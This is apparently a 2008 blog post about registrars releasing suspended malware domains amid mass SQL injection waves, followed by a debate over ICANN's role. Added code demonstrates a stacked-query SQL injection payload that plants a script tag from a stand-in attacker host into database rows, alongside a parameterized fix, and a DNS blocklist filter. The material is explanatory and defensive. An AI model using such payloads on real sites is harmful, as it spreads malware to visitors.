
Domain Registrars Releasing Suspended Domains to Attackers

Mary Landesman of ScanSafe reports: "A new outbreak of SQL attacks began on the 8th. Not that they ever really go away, but new waves replace the old ones. The attackers are using a much larger number of domains than seen in previous months. Just 11 days into June, and already 54 of these domains have been observed. Many of these are previously suspended domains that registrars have released back to the attackers. The end result: some of the domains involved in the late May and early June attacks are now active again. Thus not only newly compromised sites are foisting the malware, but any sites previously compromised that have not cleaned up their pages (and properly parameterized their SQL queries) will now once again be serving as conveyor belts for password stealing trojans. (Description of how SQL injection attacks work)"

"This is exactly illustrative of the problems that are enormous in the entire domain registration process," says Paul Ferguson. "...criminals are continually gaming the domain registration process without fear of retribution or punishment. This has got to change — these domain registration policy loopholes must be closed — before we can even begin to have an impact on the criminal manipulation of the domain registration process."

Read full story: External Source
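The mass SQL injection Landesman describes worked by handing a web application a "numeric" parameter that closed its query and stacked an UPDATE which appended a script tag to every text column, so every page served from that database loaded the attackers' JavaScript. The following is an added example, not code from ScanSafe, CircleID or any of the affected sites: it shows the concatenated query beside the parameterized one she says compromised sites need, plus the page clean-up step. The table layout, the row contents and the script URL (attacker.invalid) are all constructed for the example; SQLite's executescript() stands in for the stacked-query behaviour of the MS SQL Server targets, since sqlite3.execute() refuses a second statement.

```python
import sqlite3

# Constructed sample content: a small table of the kind the 2008 mass
# injections modified, appending a <script> tag to every text field.
SAMPLE_ROWS = [(1, "Welcome to our site"), (2, "Second story")]
# Hypothetical malware host, an assumption for this example only.
ATTACKER_SCRIPT_URL = "http://attacker.invalid/js.js"


def fresh_db():
    """Create an in-memory database holding the sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, body TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    db.commit()
    return db


def injection_payload(script_url=ATTACKER_SCRIPT_URL):
    """Value an attacker sends in place of a numeric article id.

    It closes the intended SELECT and stacks an UPDATE that appends a
    script tag to every row. Real payloads usually end with a comment
    marker so that any SQL the application appends is discarded."""
    tag = '<script src="%s"></script>' % script_url
    return "1; UPDATE news SET body = body || '%s'" % tag


def vulnerable_lookup(db, article_id):
    """The bug: SQL assembled by string concatenation.

    executescript() runs every statement in the string, emulating the
    stacked queries the MS SQL targets accepted. The SELECT's rows are
    what the application would have rendered; the UPDATE is the attack."""
    sql = "SELECT body FROM news WHERE id = " + str(article_id)
    db.executescript(sql)


def safe_lookup(db, article_id):
    """Parameterized query: the value is bound as data and can never
    become SQL, so the payload simply matches no row."""
    cur = db.execute("SELECT body FROM news WHERE id = ?", (article_id,))
    return [r[0] for r in cur.fetchall()]


def page_bodies(db):
    """What site visitors are served: every body column, in id order."""
    return [r[0] for r in db.execute("SELECT body FROM news ORDER BY id")]


def infected_rows(db):
    """Count rows carrying an injected script tag."""
    cur = db.execute("SELECT count(*) FROM news WHERE body LIKE '%<script%'")
    return cur.fetchone()[0]


def clean_pages(db, script_url=ATTACKER_SCRIPT_URL):
    """Strip the injected tag from every row and return the rows still
    infected. Only worth doing once the query bug is fixed; otherwise
    the next wave re-infects the same rows, as Landesman notes."""
    tag = '<script src="%s"></script>' % script_url
    db.execute("UPDATE news SET body = replace(body, ?, '')", (tag,))
    db.commit()
    return infected_rows(db)


if __name__ == "__main__":
    db = fresh_db()
    vulnerable_lookup(db, injection_payload())
    print("infected after attack on vulnerable code:", infected_rows(db))
    print("rows still infected after clean-up:", clean_pages(db))
    db = fresh_db()
    print("parameterized lookup with payload:", safe_lookup(db, injection_payload()))
    print("infected after attack on safe code:", infected_rows(db))
```

The parameterized version needs no input validation to resist this: the driver sends the query text and the value separately, so the UPDATE never reaches the parser as SQL. Cleaning the pages without fixing the query is exactly the situation described above, where previously compromised sites go back to serving the trojans as soon as the released domains come alive again.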


Follow-Up (Fergie, Jun 10, 2008 10:53 PM PST)

I stand by my comments, and I'm glad Mary brought this to our attention.

This is especially indicative of the problems that we are fighting with regards to criminals gaming the domain registration policies. This must be corrected, or the Internet will continue to slide into a state where every domain is untrusted, every domain is suspect, and there will be no trust in the entire domain registry process system whatsoever.

We're almost there now.

ICANN needs to get a clue here — the entire process is broken. Completely.

- ferg

What do you think ICANN... (James Seng, Jun 11, 2008 7:50 AM PST)

What do you think ICANN should do? Freeze these names indefinitely? The attackers could easily switch to IPs without using domain names and still carry out the attack.

I don't see this as an ICANN issue, really; it is a security problem that registries/registrars could help with during an emergency or as a stop-gap measure, but not as a long-term solution.

Re: What do you think ICANN... (Fergie, Jun 11, 2008 10:31 AM PST)

James Seng wrote:

"What do you think ICANN should do? Freeze these names indefinitely? The attackers could easily switch to IPs without using domain names and still carry out the attack."

"I don't see this as an ICANN issue, really; it is a security problem that registries/registrars could help with during an emergency or as a stop-gap measure, but not as a long-term solution."

Hi James,

While attackers could easily switch to using different domains, or the same domains with different nameservers and different IP addresses, or any combination different from the original configuration(s), the real issue here for me is that ICANN doesn't even have a process in place to properly assess the situation prior to taking actions such as this.

I'd be happy if ICANN (at the very least) instituted a process to make registrars perform some sort of preliminary assessment of the possible dangers to the Internet community at large prior to releasing domains which have previously been detected as being used for malicious or fraudulent purposes. And there are several publicly available sources which track malicious domains (e.g. malwaredomains.com).

Also, it is an exercise left for the reader to determine what measures could be taken to prevent these types of abuses from happening in the first place.

- ferg

any list, whether white or... (James Seng, Jun 11, 2008 10:41 AM PST)

Any list, whether white or black, is going to be politically challenging: How does one get onto that list? How do you get off the list? Who controls that list? Why this list and not another list?

The time and money needed to get these sorted out have to be weighed against the effectiveness of such a blacklist, which is easy to work around (just use IPs).

However, I think it is worthwhile to invest in an emergency process to suspend domains (via registries) or blackhole a specific IP address (via routing coordination). This has been done before, last year, in a botnet/virus attack. I can foresee we would need to do that again.

Re: any list, whether white or... (Fergie, Jun 11, 2008 11:32 AM PST)

I wouldn't get so wrapped up in the issue of "lists" - but let's face it, if there were ways to prevent criminals from gaming the entire Domain Registration system (and polluting the domain portion of the WHOIS database, but that's another, albeit related, issue), then we wouldn't have a need for black-hole lists, etc.

But black-hole lists, and white-lists, are both thriving. This is a statement unto itself.

The real underlying issue here is how to stop criminals from doing this in the first place…

- ferg

If you have an idea... (James Seng, Jun 11, 2008 12:15 PM PST)

If you have an idea of how to prevent criminals from using DNS without affecting innocent parties (false positives), I would be interested to hear it.

You have underestimated the difficulty of doing a list (any list). Technically, ICANN manages only two lists, a root zone file and an RIR IP allocation list. How difficult can that be, I wonder?

Re: If you have an idea... (Fergie, Jun 11, 2008 12:21 PM PST)

Of course, it's not an issue of "...allowing criminals to use DNS."

It is, however, an issue of allowing criminals to register domains simply to be used for malicious or fraudulent purposes.

Again, stop being obsessed with lists. Forget about lists.

ICANN does have the authority to set policy for domain registration, the revocation of domains, etc.

- ferg

Fergie wrote: This must be corrected... (The Famous Brett Watson, Jun 11, 2008 9:37 PM PST)

Fergie wrote:

This must be corrected, or the Internet will continue to slide into a state where every domain is untrusted, every domain is suspect, and there will be no trust in the entire domain registry process system whatsoever.

What sort of "trust" exists now? There has never been any kind of vetting process for domain name registration. All you're getting is a name-to-address resolution mechanism. What's to trust? I'd argue that any "trust" is a hangover from earlier, happier days when cybercriminals were less numerous and methodical. The system was never any more trustworthy than it is now; it's just been less abused in the past.

The real underlying issue here is how to stop criminals from doing this in the first place…

I'd argue that the issue is one of damage control. If the damage is best controlled by registrars under the influence of ICANN policy, then so be it, but I have grave doubts about this approach because it entails an apparent conflict of interests. Domain name sellers maximise business by maximising the number of domains they sell. Cybercriminals who churn through domain names rapidly are, superficially at least, good for business. (In practice, not so much, thanks to stolen credit cards.) Worse, the whole process of screening re-registrations creates expensive manual overhead in a process which can otherwise be fully automated. In short, domain name sellers are economically motivated to do a really lousy job of policing the malicious use of domain names.

ICANN does have the authority to set policy for domain registration, the revocation of domains, etc.

Policy is insufficient in and of itself: it must be backed up by policy enforcement. ICANN is supremely bad at this, and policy without enforcement is worse than no policy at all. It would be charitable to say that they're doing a so-so job of keeping greedy registries under control; let's not compound the problem by asking them to control registrants as well.

ICANN was supposed to be a purely technical oversight body. It has inevitably become a political body, because there is no technical basis for deciding such things as what domain names can go in the root beyond "is it legal name syntax?" Let's push to contain their scope rather than expand it by demanding that they protect us from the evil cyberscourge. The less they do, the better.

You point to the service "malwaredomains.com". I think that independent third parties such as this are the right place to look for a solution. We don't need to take malware domains out of the DNS at large: we just need to filter them out of our view. Don't get me wrong: I fully understand that the ideal solution would be to eliminate them from the DNS completely, but I predict you'll be getting that right after we supply all the little girls with ponies, currently scheduled for Friday the fifth of Never.

In the meantime, we should adapt the tried-and-true (if less than ideal) solution of third party DNS blacklists to the DNS itself. The tool has become a mainstay of spam filtering, and it's about time we adopted it for DNS use. ISPs have been monkeying around with their customers' DNS resolution as it is: they should use that ability to provide a useful service to their customers — simple NXDOMAIN responses for malware domains — instead of "leveraging" it for "monetization" purposes. Yes, this assumes a quaint kind of customer-service-oriented thinking which is rather lacking in the marketplace, but it can be used as a selling point, so there is at least some direct incentive for ISPs to do it. "Malware filtering" becomes another bullet point alongside "spam filtering".

Looking a little further ahead, malwaredomains.com (or its ilk) could become the next Spamhaus, offering not only a DNS blacklist, but also alerting hosting providers to the fact that they are hosting malware (just as Spamhaus aids ISPs who wish to avoid providing service to spammers). Responsible hosting providers would do periodic checks in the list for domains which they are hosting, and pro-actively disable sites that appear in the list. Like other blacklist operators, they would have no official authority, but have substantial impact built by a large user base which trusts them to do a good and proper job.
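The resolver-side filter Brett Watson proposes (answer NXDOMAIN for names on a malware-domain list, and otherwise resolve normally) is small enough to show end to end. What follows is an added example written for this page, not code from any commenter, ISP or list operator: it parses a DNS query, matches the queried name and its parent domains against a list, and builds the NXDOMAIN reply on the wire. The blocklist entries (malware.example, evil-loader.test) are constructed for the example, and only the stdlib is used; a production resolver would do the same thing with a response policy zone (RPZ) rather than hand-built packets.

```python
import struct

# Constructed sample blocklist; a real deployment would load a feed such as
# the malwaredomains.com list mentioned in the thread.
BLOCKLIST = {"malware.example", "evil-loader.test"}


def encode_name(name):
    """Encode "a.b.c" as DNS labels: 1a1b1c0."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, off):
    """Decode labels starting at buf[off]; return (name, offset after name).
    Compression pointers never appear in a question, so they are rejected."""
    labels = []
    while True:
        length = buf[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question section")
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), off


def build_query(name, qid=0x1234, qtype=1, qclass=1):
    """Build a stub-resolver style query (RD set, one question)."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, qclass)


def parse_query(pkt):
    """Parse header and the single question of a query packet."""
    qid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", pkt[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"id": qid, "flags": flags, "qname": qname.lower(),
            "qtype": qtype, "qclass": qclass, "question_end": off + 4}


def is_blocked(qname, blocklist):
    """True if qname or any parent domain is listed, so that a listed
    malware.example also covers cdn.malware.example (but not
    notmalware.example, which is a different name)."""
    labels = qname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def nxdomain_response(pkt):
    """Reply to the query with RCODE 3 (NXDOMAIN), echoing id, RD and question."""
    q = parse_query(pkt)
    rd = q["flags"] & 0x0100
    flags = 0x8000 | rd | 0x0080 | 0x0003       # QR, RD as asked, RA, RCODE=3
    header = struct.pack("!HHHHHH", q["id"], flags, 1, 0, 0, 0)
    return header + pkt[12:q["question_end"]]  # copy the question verbatim


def rcode(pkt):
    """Extract the RCODE field from a DNS packet header."""
    return struct.unpack("!H", pkt[2:4])[0] & 0x0F


def filter_query(pkt, blocklist=BLOCKLIST):
    """Return a synthesised NXDOMAIN for listed names, or None when the
    query should be forwarded to the upstream resolver unchanged."""
    q = parse_query(pkt)
    if is_blocked(q["qname"], blocklist):
        return nxdomain_response(pkt)
    return None


if __name__ == "__main__":
    for name in ("cdn.malware.example", "notmalware.example", "circleid.com"):
        reply = filter_query(build_query(name))
        print(name, "-> NXDOMAIN" if reply is not None else "-> forward upstream")
```

Two caveats a practitioner would add. A negative answer without an SOA record in the authority section cannot be negatively cached by downstream resolvers (RFC 2308), so a real filter should include one or, better, use RPZ and let the server do it. And, as James Seng points out above, this only affects clients that use the filtering resolver; malware that talks to raw IP addresses or hard-codes another resolver never sees the NXDOMAIN, and a DNSSEC-validating stub will treat the synthesised reply as bogus.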

